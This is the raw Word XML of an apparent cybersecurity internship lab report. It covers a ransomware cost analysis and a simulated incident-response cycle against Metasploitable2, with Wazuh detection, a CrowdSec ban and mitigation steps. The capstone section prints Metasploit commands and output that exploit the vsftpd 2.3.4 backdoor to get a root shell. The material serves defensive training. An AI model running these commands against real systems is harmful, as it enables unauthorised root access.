    <w:p w14:paraId="0EB69424" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5DD896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Conclusion: The organization should invest up to $2,000 per year in ransomware controls. Cost-effective controls include offline backups ($300/yr), endpoint protection ($600/yr), and employee awareness training ($500/yr) — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>totaling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> $1,400/yr, well within the ALE threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644AAC1C" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB9A22A" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.7 Incident Response Report — Phishing Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8EDFA1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Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1725EA13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On May 29, 2026, a simulated phishing attack was conducted in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CyArt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> internship lab environment as part of Week 2 incident response training. The attack successfully exploited the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 backdoor vulnerability (CVE-2011-2523) on Metasploitable2 (10.0.2.3), resulting in an unauthenticated remote root shell. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIDS detected anomalous activity within minutes, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> successfully contained the threat by banning the attacker IP. No production systems were affected. All activities were conducted in an isolated NAT network environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491926D" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FAB29EC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Incident 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913"/>
        <w:gridCol w:w="1796"/>
        <w:gridCol w:w="2111"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3FCA9843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744A2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Time (EDT)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CB68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Event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2E0B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287A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Action Taken</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="51BB174D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01B9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00:06:21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EE36A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vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> backdoor spawned — Meterpreter session 1 opened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753D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Metasploitable2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936E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Attack initiated from 10.0.2.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4B2569A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9C7F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00:06:21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8B376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 Rule 533 triggered — netstat port change detected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964D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Kali (</w:t>
            </w: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EAE6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Alert logged in alerts.log</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="349E61F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3FDE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lastRenderedPageBreak/>
              <w:t>00:10:15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0112F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 xml:space="preserve"> decision added — IP 10.0.2.15 banned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00D9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Kali (</w:t>
            </w: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5572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24-hour ban applied (Decision #29998)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="354BAE2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20396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00:10:40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7495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Second Meterpreter session opened (re-exploitation test)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53A1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Metasploitable2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15F2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Session terminated — ban noted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="262C104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4483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00:12:35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21A4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Suricata rules deployed to /etc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>/rules/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>local.rules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5E7A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Kali (Suricata)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5132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IDS rules activated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5F36056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8D66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00:13:42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6914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Suricata started in daemon mode on eth0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0126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Kali (Suricata)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FE44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Network monitoring active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36796F46" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAE8EC5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Mitigation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7FA34" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate: Apply </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ban on attacker IP 10.0.2.15 (completed — Decision #29998)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21366041" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term: Upgrade </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to version 3.0.5 or later to eliminate backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E175C67" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Short-term: Deploy Suricata IDS rule SID:1000002 to detect FTP backdoor attempts on all network segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140BD80" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Medium-term: Implement network segmentation to isolate FTP services from internal networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB2A86C" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium-term: Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> active response to automatically block IPs triggering high-severity alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF417AB" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term: Conduct quarterly vulnerability scans using OpenVAS and track remediation in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>DefectDojo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="723CCC31" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Long-term: Establish SOC playbook for FTP backdoor incidents aligned with NIST CSF Respond function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2172622C" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2CFAE4" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.8 Capstone Project — Full Incident Response Cycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A1CC8E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 xml:space="preserve">2.8.1 Attack Simulation — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E312140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The capstone project executed a complete attack-detect-contain-report cycle using the Metasploit Framework against Metasploitable2. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 backdoor (CVE-2011-2523) was exploited to demonstrate a real-world attack scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD580E5" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BEB9B8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# Metasploit Exploitation — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E78A4E" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1B099" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit &gt; set LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D0A464" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit &gt; set RHOSTS 10.0.2.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F5CC2" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D63C72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[+] 10.0.2.3:21 - Backdoor has been spawned!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD99D35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[*] Meterpreter session 1 opened (10.0.2.15:4444 -&gt; 10.0.2.3:44872)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1970E084" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61E0FA" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">  =&gt;  root   |   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38009310" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0916A827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 xml:space="preserve">2.8.2 Detection — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> HIDS Alerts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83"/>
        <w:gridCol w:w="2622"/>
        <w:gridCol w:w="800"/>
        <w:gridCol w:w="803"/>
        <w:gridCol w:w="2028"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="05F8A450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DA3C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Timestamp (EDT)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FF6C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Source IP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C38E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Alert Description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0616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61BB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Level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301C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MITRE Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="20EA56F2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4433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00:06:18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2762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10.0.2.15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ACD3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Netstat port change — new ports opened by attack tooling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EBEA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533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4A4B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00C7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T1046 — Network Service Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="2174887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63A1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00:10:16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026D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10.0.2.15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F5B8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Successful </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> to ROOT — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>cscli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> decisions add executed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6235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5402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6219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349D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T1548 — Abuse Elevation Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="3743DF1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4CC8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00:10:16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7E5F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10.0.2.15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EC73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PAM Login session opened for root user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C8A0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5501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8FA1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F881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T1078 — Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4F09523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2A3A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00:13:42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C911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10.0.2.15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6CFE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Suricata IDS started — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>suricata</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> eth0 -D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2EC1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5402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8356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489D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T1562 — Impair </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Defenses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Reversed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33A35ED9" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7A6906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 xml:space="preserve">2.8.3 Containment — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Ban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244"/>
        <w:gridCol w:w="1814"/>
        <w:gridCol w:w="1145"/>
        <w:gridCol w:w="925"/>
        <w:gridCol w:w="2571"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="4458C2C3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BDBE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Decision ID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F124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IP Banned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C982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Reason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563F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8A7C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8C42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Verified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="53481177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4831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29998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5D17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10.0.2.15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0857C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vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit detected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DD10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24 hours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97B8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ban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4861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Yes — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>cscli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> decisions list confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0ED2F386" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD527BB" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>2.8.4 Capstone Summary Report (200 words)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056218CA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>During the Week 2 capstone exercise, a complete incident response cycle was executed in an isolated lab environment (NAT network: 10.0.2.0/24). The attack phase began at 00:06:21 EDT when Metasploit's vsftpd_234_backdoor module successfully exploited CVE-2011-2523 on Metasploitable2 (10.0.2.3), spawning an unauthenticated reverse shell with root privileges. Post-exploitation commands confirmed full system access (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>=0).</w:t>
